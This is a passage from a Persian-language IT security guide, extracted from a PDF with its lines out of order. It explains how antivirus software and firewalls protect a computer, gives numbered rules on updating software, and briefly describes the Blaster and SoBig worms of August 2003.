‫ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻛﻪ ﻫﺮ ﺩﺳﺘﮕﺎﻩ ﻣﺠﻬﺰ ﺑﻪ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻧﺪ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻳﻚ ﻣﺮﻛﺰ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻏﻴﺮ ﻣﺤﺪﻭﺩ ﻋﻤﻞ ﻧﻤﺎﻳﺪ )ﺍﻟﺒﺘـﻪ ﺍﮔـﺮ‬
‫ﺍﻳــﻦ ﻗﺎﺑﻠﻴــﺖ ﺗﻮﺳــﻂ ﻛــﺎﺭﺑﺮ ﻏﻴﺮﻓﻌــﺎﻝ ﻧﻤــﻲﺷــﺪ(‪ .‬ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ ﺑــﻪ‬
‫ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺩ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎ ﺑـﺮﺍﻱ ﺗﻮﺯﻳـﻊ‬
‫ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪ ،‬ﺑـﺪﻭﻥ ﺁﻧﻜـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺻـﺎﺣﺒﺎﻥ‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎ ﺍﺯ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫‪٩٣‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻛﺮﻣﻬـﺎ‬
‫ﻭ ﺗﺮﺍﻭﺍﻫﺎﻱ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺍﻳﻤﻦ ﻣﻲﺳﺎﺯﻧﺪ‪:‬‬
‫ﻓﺼﻞ ﻫﻔﺘﻢ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ‬
‫•‬
‫ﻫﺮﮔﺎﻩ ﻳﻚ ﺩﻳﺴﻚ ﺧﺎﺭﺟﻲ ﻭﺍﺭﺩ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﻛﻨﻴﺪ ﺁﻧـﺮﺍ‬
‫ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻛﻠﻴﺎﺕ‬
‫•‬
‫ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﺷـﻮﺩ‪ ،‬ﺧـﻮﺩ‬
‫ﻧﺎﻣﻪ ﻭ ﺿﻤﺎﺋﻢ ﺁﻥ ﺑﺮﺍﻱ ﻋﺎﺭﻱ ﺑﻮﺩﻥ ﺍﺯ ﻫﺮ ﻧﻮﻉ ﻭﻳـﺮﻭﺱ‬
‫ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫•‬
‫ﻫﺮﮔﺎﻩ ﻓـﺎﻳﻠﻲ ﺍﺯ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ‪ download‬ﺷـﻮﺩ‬
‫ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫•‬
‫ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺻﻔﺤﺔ ﻭﺏ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ‬
‫ﺟﺎﺳﺎﺯﻱ ﺷﺪﻩ ﺩﺭ ﺁﻥ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ‪ download‬ﺷـﻮﺩ‬
‫ﺑﺮﺭﺳﻲ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫•‬
‫ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻳـﻚ ﻓﺎﻳـﻞ‪،‬‬
‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﻭ ﻳﺎ ﺗﻤﺎﻣﻲ ﺩﻳـﺴﻜﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﻭﻳﺮﻭﺱ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﻳﻚ ﻭﻳﺮﻭﺱ‪ ،‬ﻛﺮﻡ‪ ،‬ﻳﺎ ﺗﺮﺍﻭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﺩ‪ ،‬ﺍﻳﻦ ﺍﺑﺰﺍﺭ‬
‫ﺁﻧﺮﺍ ﺍﺯ ﺑﻴﻦ ﻣﻲﺑﺮﺩ ﻳﺎ ﺍﮔﺮ ﻧﺘﻮﺍﻧﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫـﺪ ﺑـﻪ‬
‫ﺷﻤﺎ ﺍﻃﻼﻉ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﻳﻦ ﻣﺸﻜﻞ ﻗﺎﺑﻞ ﺭﻓﻊ ﻧﻴـﺴﺖ؛ ﻭ‬
‫ﺩﺭﻧﺘﻴﺠﻪ ﻓﺎﻳﻞ ﺧﺮﺍﺏ ﺭﺍ ﻗﺮﻧﻄﻴﻨﻪ ﻣﻲﻛﻨﺪ ﻭ ﺑﺪﻳﻨﻮﺳـﻴﻠﻪ ﺍﺯ‬
‫ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﺳﺎﻳﺮ ﻗﺴﻤﺘﻬﺎﻱ ﺳﻴـﺴﺘﻢ ﻓﺎﻳـﻞ ﺟﻠـﻮﮔﻴﺮﻱ‬
‫ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﺭﻭﺷﻬﺎﻱ ﺍﻓـﺰﺍﻳﺶ‬
‫ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪﻫﺎ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻣﻨﻈﻮﺭ ﺍﺯ‬
‫ﺑﺴﺘﻪ ﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻫﻤﺎﻥ ﻭﻳﺮﻭﺱ ﻳﺎﺑﻬﺎ‪ ،‬ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ‬
‫ﺁﺗﺶ‪ ،‬ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺖ‪.‬‬
‫ﻭﻳﺮﻭﺱﻳﺎﺏ‬
‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺘﻢ‪:‬‬
‫ﺭﻭﻱ ﻫﺮ ﺭﺍﻳﺎﻧﺔ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻧﺴﺒﺖ ﺑﻪ ﻭﻳـﺮﻭﺱ ﺑﺎﻳـﺪ‬
‫ﻧــﺮﻡﺍﻓــﺰﺍﺭ ﺿــﺪﻭﻳﺮﻭﺱ ﻧــﺼﺐ ﺷــﻮﺩ ﻭ ﻫــﺮ ﺭﻭﺯ‬
‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﮔﺮﺩﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺩﺳﺘﮕﺎﻩ ﺑﺎﻳﺪ ﺑـﺼﻮﺭﺕ‬
‫ﺩﻭﺭﻩﺍﻱ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻭﻳﺮﻭﺱ ﺟﺴﺘﺠﻮﻱ ﻛﺎﻣﻞ ﺷﻮﺩ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﻳﻜﻢ‪:‬‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻭﻳﺮﻭﺳـﻬﺎ ﻗـﺮﺍﺭ‬
‫ﻧﻤﻲﮔﻴﺮﻧـﺪ )ﻣﺎﻧﻨـﺪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪ (Unix‬ﺑﺎﻳـﺪ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ ﻛﻪ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺭﺳـﺎﻟﻲ‬
‫ﺣﺎﻭﻱ ﻭﻳﺮﻭﺱ ﻧﻴﺴﺖ ﺗـﺎ ﺑـﻪ ﮔﻴﺮﻧـﺪﻩ ﻧﻴـﺰ ﺁﺳـﻴﺒﻲ‬
‫ﻧﺮﺳﺪ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﺩﻭﻡ‪:‬‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻬﻢ ﺧﻮﺩ ﺭﺍ‬
‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﻤﺎﻳﻴﺪ ﻭ ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ‬
‫ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ﺗﻨﻬﺎ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻣﻬﺎﺟﻢ ﺑـﻪ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ‬
‫ﺑﺮﺭﺳــﻲ ﻣــﻲﻛﻨﻨــﺪ؛ ﺩﺭﺣﺎﻟﻴﻜــﻪ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ‬
‫ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﻣﻮﺟﺐ ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﺳﻴﺴﺘﻢ ﺍﺯ ﺍﺑﻌﺎﺩ ﺩﻳﮕﺮ ﺷﻮﻧﺪ‪.‬‬
‫ﻭﺟــﻮﺩ ﻳــﻚ ﻭﻳــﺮﻭﺱﻳــﺎﺏ ﺣــﺎﻭﻱ ﻧــﺸﺎﻧﻬﺎﻱ ﻭﻳــﺮﻭﺱ‬
‫‪١٠٦‬‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺷﺪﻩ )"ﻧﺸﺎﻥ" ﻣﺸﺨﺼﺔ ﺧﺎﺻﻲ ﺍﺯ ﻳﻚ ﻭﻳـﺮﻭﺱ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻭﻳﺮﻭﺱﻳﺎﺏ ﺗﻮﺳﻂ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﻧﻮﻉ ﻭﻳﺮﻭﺱ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫـﺪ(‪ ،‬ﻳﻜـﻲ ﺍﺯ‬
‫ﻣﻬﻤﺘﺮﻳﻦ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﻳﻚ ﺷـﺒﻜﻪ ﺍﺳـﺖ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﻪ‬
‫ﺍﻳﻨﺘﺮﻧــﺖ ﻣﺘــﺼﻞ ﺑﺎﺷــﺪ‪ .‬ﺗﻮﺟــﻪ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺑﺘــﺎﺯﮔﻲ‬
‫ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻣﺤﻴﻂ ‪ UNIX‬ﺩﺭﺣﺎﻝ ﮔﺴﺘﺮﺵ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﻛﺮﻣﻬﺎ ﻭ ﺗﺮﺍﻭﺍﻫﺎ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺤﻴﻂ ﺍﺯ ﻗﺒﻞ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪﺍﻧﺪ‪.‬‬
‫ﺗﺎ ﺍﻭﺍﺧﺮ ﺁﮔﻮﺳﺖ ‪ ۲۰۰۳‬ﻳﻜـﻲ ﺍﺯ ﺿﺪﻭﻳﺮﻭﺳـﻬﺎﻱ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ‬
‫ﺷﺨــــﺼﻲ ﻭ ‪) Macintosh‬ﺿــــﺪﻭﻳﺮﻭﺱ ‪ (Norton‬ﺗﻘﺮﻳﺒــــﹰﺎ‬
‫‪106 Virus Signatures‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫•‬
‫ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﻪ ﻓﺎﻳﻠﻲ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻳـﺎ ﺁﻧـﺮﺍ‬
‫ﻛﭙﻲ‪ ،‬ﺫﺧﻴﺮﻩ‪ ،‬ﻣﻨﺘﻘﻞ‪ ،‬ﺑﺎﺯ ﻳﺎ ﺑﺴﺘﻪ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﺟﻠـﻮﻱ ﺁﺳـﻴﺐ‬
‫ﺭﺳﺎﻧﺪﻥ ﻭﻳﺮﻭﺳﻬﺎ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫‪٩٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﻲﺗﻮﺍﻧﺴﺖ ‪ ۶۵۰۰۰‬ﻭﻳﺮﻭﺱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ‪ .‬ﺁﮔﻮﺳﺖ‬
‫‪ ۲۰۰۳‬ﺍﺯ ﻧﻈﺮ ﺍﻧﺘﺸﺎﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺨـﺮﺏ ﻣـﺎﻩ ﺟـﺎﻟﺒﻲ ﺑـﻮﺩ‪،‬‬
‫ﭼﺮﺍﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺮﻣﻬﺎ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺎﻩ ﻣﻨﺘـﺸﺮ ﺷـﺪﻧﺪ ﺍﺯ ﻳـﻚ‬
‫ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ ﺑــﺴﻴﺎﺭ ﺣﻴــﺎﺗﻲ ﺩﺭ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ‪Windows‬‬
‫ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﻲﻛﺮﺩﻧﺪ )‪ Blaster‬ﻭ ‪ SoBig‬ﺍﺯ ﺭﺍﻳﺠﺘﺮﻳﻦ ﺁﻧﻬﺎ ﺑﻮﺩﻧـﺪ(‪.‬‬
‫ﻳﻜﻤﺎﻩ ﭘﻴﺸﺘﺮ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺮﺍﻱ ﺁﻥ ﻭﺻﻠﻪﺍﻱ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﺑﻮﺩ‪،‬‬
‫ﺍﻣﺎ ﺍﻓﺮﺍﺩ ﻛﻤﻲ ﺁﻧﺮﺍ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻛﺮﻣﻬﺎﻱ‬
‫ﺟﺪﻳﺪ ﺗﻮﺍﻧـﺴﺘﻨﺪ ﺑـﻪ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺯﻳـﺎﺩﻱ ﺁﺳـﻴﺐ ﺑﺰﻧﻨـﺪ ﻭ ﺑـﻪ‬
‫ﺳﺮﻋﺖ ﺩﺭ ﺁﻧﻬﺎ ﭘﺨﺶ ﺷﻮﻧﺪ؛ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺷﺎﻳﺪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ‬
‫ﺭﻛﻮﺭﺩﻫﺎﻱ ﺟﺪﻳﺪﻱ ﺑﻪ ﺛﺒﺖ ﺭﺳﻴﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺷﻠﻮﻏﺘﺮﻳﻦ ﺭﻭﺯ ﺁﻥ‬
‫ﻣﺎﻩ‪ ،‬ﻭﻳﺮﻭﺱﻳﺎﺏ ‪ Norton‬ﺣﺪﻭﺩ ‪ ۵۰‬ﻧﺸﺎﻥ ﺟﺪﻳـﺪ ﻭﻳـﺮﻭﺱ ﺭﺍ‬
‫ﺑﻪ ﻓﻬﺮﺳﺖ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺧﻮﺩ ﺍﺿﺎﻓﻪ ﻧﻤـﻮﺩ‪ .‬ﺍﻳـﻦ‬
‫ﻋﺪﺩ ﺗﺎ ﻳﻜﻤﺎﻩ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺑﻪ ﺣﺪﻭﺩ ‪ ۵۲۰‬ﺭﺳﻴﺪ‪.‬‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨـﺪ ‪ -‬ﺭﺍ ﻧﻴـﺰ‬
‫ﺩﺭﻳﺎﺑﻴﺪ‪ .‬ﺍﮔﺮ ﺑﺎ ﭘﺮﻭﺗﻜﻞ ‪ TCP/IP‬ﺁﺷﻨﺎ ﻫـﺴﺘﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ‬
‫ﻓﺼﻞ ﺑﻌﺪﻱ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺍﻣﺎ ﺍﮔﺮ ﺁﻧﺮﺍ ﻧﻤﻲﺷﻨﺎﺳﻴﺪ ﺍﺑﺘﺪﺍ ﺿﻤﻴﻤﺔ‬
‫‪ ۲‬ﻫﻤﻴﻦ ﺑﺨﺶ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺣﺘـﻲ‬
‫ﺩﺭﺻــﻮﺭﺗﻴﻜﻪ ﻧﺨﻮﺍﻫﻴــﺪ ﺍﻳــﻦ ﺟﺰﺋﻴــﺎﺕ ﺭﺍ ﺑﻴﺎﻣﻮﺯﻳــﺪ ﻫﻤﭽﻨــﺎﻥ‬
‫ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣﻪ ﺗﻤـﺎﻣﻲ ﺁﻧﭽـﻪ‬
‫ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺧﻼﺻﻪ ﺩﺭ ﻣﻮﺭﺩ ‪ TCP/IP‬ﺑﺪﺍﻧﻴﺪ ﺫﻛـﺮ‬
‫ﻣﻲﺷﻮﺩ‪:‬‬
‫•‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ ﺩﺍﺭﺍﻱ ﻳـﻚ‬
‫ﺁﺩﺭﺱ ‪ IP‬ﺑﻪ ﺷﻜﻞ ‪ 12.222.103.43‬ﻣﻲ ﺑﺎﺷﻨﺪ ﻛـﻪ‬
‫ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻣﻲﺑﻴﻨﻴـﺪ ﻣﺘـﺸﻜﻞ ﺍﺯ ﭼﻬـﺎﺭ ﻋـﺪﺩ ﻣﺠـﺰﺍ‬
‫ﺍﺳﺖ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻣﺴﻴﺮ ﭘﻴﺎﻡ ﺍﺯ ﺍﻳﻦ ﺁﺩﺭﺱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﻫﺮ ﺭﺍﻳﺎﻧـﻪ ﺑـﺎ ﺍﺭﺍﺋـﻪ ﺁﺩﺭﺱ ﻣﻘـﺼﺪ ﺩﺭ‬
‫ﭼﻨﻴﻦ ﻗﺎﻟﺒﻲ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳـﻦ ﭘﻴﺎﻣﻬـﺎ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﻛﺠﺎ ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ‪.‬‬
‫•‬
‫ﺩﺭ ﻫﺮ ﺩﺳـﺘﮕﺎﻩ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﺑﻮﺳـﻴﻠﻪ ﺷـﻤﺎﺭﺓ‬
‫‪١٠٩‬‬
‫ﭘﻮﺭﺕ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ )ﻣﺎﻧﻨﺪ ﺷـﻤﺎﺭﻩ ﺗﻠﻔﻨﻬـﺎﻱ ﺩﺍﺧﻠـﻲ‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬
‫ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻤﺎﻣﻲ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺩﺍﺧﻞ ﻳﺎ ﺧـﺎﺭﺝ ﺍﺯ ﺷـﺒﻜﻪ ﺭﺍ‬
‫ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻭ ﺑﺮ ﺍﺳﺎﺱ ﻣﺠﻤﻮﻋﻪ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺟﻮﺩ ﺩﺭ ﺧﻮﺩ ﺑـﻪ‬
‫ﺗﺮﺍﻓﻴﻚ‪ ١٠٧‬ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺷﺒﻜﻪ ﻋﺒﻮﺭ ﻛﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﻣﺘﻮﻗـﻒ‬
‫ﻣﻲﺳﺎﺯﺩ‪ .‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻜﻞ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ‬
‫ﻧﺼﺐ ﺷﻮﺩ ﻳﺎ ﻗﺴﻤﺘﻲ ﺍﺯ ﺗﺠﻬﻴـﺰﺍﺕ ﻣﻴـﺎﻥ ﺭﺍﻳﺎﻧـﻪ )ﻳـﺎ ﮔﺮﻭﻫـﻲ ﺍﺯ‬
‫ﻱ ﺁﻥ ﺑﺎﺷﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ( ﻭ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍ ﹺ‬
‫‪١٠٨‬‬
‫ﺩﺭ ﺑﻌــﻀﻲ ﺗﺠﻬﻴــﺰﺍﺕ ﺩﻳﮕــﺮ ﻣﺎﻧﻨــﺪ ﻣــﺴﻴﺮﻳﺎﺑﻬﺎ ﻗــﺮﺍﺭ ﺩﺍﺩﻩ‬
‫ﻻ ﺭﺍﻳﮕــﺎﻥ ﻭ‬
‫ﻣــﻲﺷــﻮﺩ‪ .‬ﺍﻳــﻦ ﻧــﻮﻉ ﺩﻳــﻮﺍﺭﻩﻫــﺎﻱ ﺁﺗــﺶ ﻣﻌﻤــﻮ ﹰ‬
‫ﺍﺯ ﭘﻴﺶ ﻧﺼﺐﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭﺟﻮﺩ‬
‫ﺩﺍﺭﻧﺪ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﺳﻮﻡ‪:‬‬
‫ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﻳـﻚ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ‬
‫ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ ﻛﻪ ﻣﻲ ﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺼﻮﺭﺕ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ‬
‫ﺩﺭ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻧﺼﺐ ﻧﻤﻮﺩ ﻳـﺎ ﺑـﺼﻮﺭﺕ ﻳـﻚ ﺩﻳـﻮﺍﺭﺓ‬
‫ﺁﺗﺶ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺩ‪.‬‬
‫ﺑﺎ ﺩﺭﻙ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﭼﻪ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫـﺪ‬
‫ﻭ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻗﻮﺍﻧﻴﻨﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺁﻥ ﺗﻨﻈـﻴﻢ ﻧﻤـﻮﺩ ﺑﺎﻳـﺪ‬
‫ﻣﻔﻬﻮﻡ ﭘﺮﻭﺗﻜـﻞ ‪ - TCP/IP‬ﻣﺠﻤﻮﻋـﻪ ﻗـﻮﺍﻧﻴﻨﻲ ﻛـﻪ ﺗﻤـﺎﻣﻲ‬
‫‪ ۱۰۷‬ﻣﻨﻈﻮﺭ ﺍﻃﻼﻋﺎﺕ ﺗﺒﺎﺩﻝ ﺷﺪﻩ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﺳﺖ‬
‫‪108 Router‬‬
